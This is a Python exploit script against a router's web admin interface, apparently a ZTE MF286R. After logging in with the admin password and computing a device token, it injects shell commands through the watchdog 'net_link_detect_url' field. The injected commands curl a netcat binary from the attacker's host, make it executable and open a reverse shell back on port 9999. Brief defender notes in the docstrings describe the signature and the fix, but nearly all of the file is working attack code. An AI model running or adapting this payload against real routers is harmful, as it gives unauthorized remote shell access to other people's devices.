import time
import requests
import hashlib
import sys
import base64
# Version strings that get_AD() folds into the AD token sent with form writes.
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"


def FORM(x):
    """Return the base form body for goform id ``x`` (``isTest`` is always False)."""
    return {"isTest": False, "goformId": x}


# One shared session so cookies set by login() are sent on later s.post() calls.
s = requests.Session()
def login():
    """Authenticate to the device's LOGIN goform through the shared session ``s``.

    Posts ``PASSWD`` (already base64-encoded in ``__main__``) with the common
    ``HDRS`` and prints "[+] Login: success" when the JSON reply carries
    ``result == "0"``, "[+] Login: fail" otherwise. The outcome is only printed,
    not returned, so the caller cannot branch on it.
    """
    form = FORM("LOGIN")
    form["password"] = PASSWD
    reply = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=form,
    )
    outcome = reply.json()
    if outcome["result"] == "0":
        print("[+] Login: success")
    else:
        print("[+] Login: fail")
def get_AD():
    """Compute the AD token that rce() attaches to its WATCH_DOG_SWITCH write.

    The token is ``md5(md5(wa_inner_version + cr_version) + RD)`` where ``RD``
    is read from the device's ``goform_get_cmd_process`` endpoint on every call;
    the version strings are the module-level constants. Note that this request
    uses the bare ``requests`` module rather than the session ``s``, so cookies
    obtained by login() are not sent here.

    Returns:
        The hex digest string used as the ``AD`` form field.
    """
    def hexdigest(text):
        return hashlib.md5(text.encode("utf-8")).hexdigest()

    version_hash = hexdigest(wa_inner_version + cr_version)
    # Cache-busting timestamp query parameter, same shape as the device UI uses.
    stamp = int(time.time())
    rd_reply = requests.get(
        f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={stamp}",
        headers=HDRS,
    )
    return hexdigest(version_hash + rd_reply.json()["RD"])
def get_response(server_resp):
    """Print whether the device's reply body contains the word "success".

    Args:
        server_resp: any object exposing a ``.text`` attribute (a ``requests``
            response in practice). Only substring presence is checked, so a
            body such as ``{"result":"success"}`` counts as success.
    """
    verdict = "success" if "success" in server_resp.text else "fail"
    print(f"[+] payload injected: {verdict}")
def rce():
    """Send the command-injection payload through the WATCH_DOG_SWITCH goform.

    The injection sink is the ``net_link_detect_url`` field: the value begins
    with ``;`` and chains shell commands, so the device presumably hands the
    URL to a shell without validation (TODO confirm against the firmware).
    The write is sent on the logged-in session ``s`` together with the AD
    token from get_AD(); get_response() prints the device's verdict.

    Defender notes: the observable signature is a WATCH_DOG_SWITCH write whose
    ``net_link_detect_url`` contains shell metacharacters, followed by the
    device fetching from ``IP:8080`` and opening a connection to ``IP:9999``;
    the device-side fix is to accept only a well-formed URL in that field.
    """
    dog_form = FORM("WATCH_DOG_SWITCH")
    # Presumably the detector must be enabled for the URL to be used at all.
    dog_form["net_link_detect_enable"] = 1
    # Leading ';' terminates whatever command the URL is interpolated into.
    payload = ";"
    payload += f"curl {IP}:8080/netcat --output /tmp/netcat; "
    payload += "chmod +x /tmp/netcat;"
    payload += f"/tmp/netcat -e sh {IP} 9999"
    dog_form["net_link_detect_url"] = payload
    # AD is recomputed per write; see get_AD() for how it is derived.
    dog_form["AD"] = get_AD()
    a = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=dog_form,
    )
    get_response(a)
if __name__ == "__main__":
    # Positional arguments: device base URL, admin password, callback address.
    if len(sys.argv) < 4:
        print(
            "usage: python3 exploit.py http://<router_ip> <admin_password> <attacker_ip, es: 192.168.1.101>"
        )
        sys.exit(0)
    HOST, raw_password, IP = sys.argv[1:4]
    # The LOGIN form is sent the password base64-encoded, not hashed.
    PASSWD = base64.b64encode(raw_password.encode()).decode()
    # Origin/Referer are set to the device itself, as a browser session would.
    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }
    login()
    rce()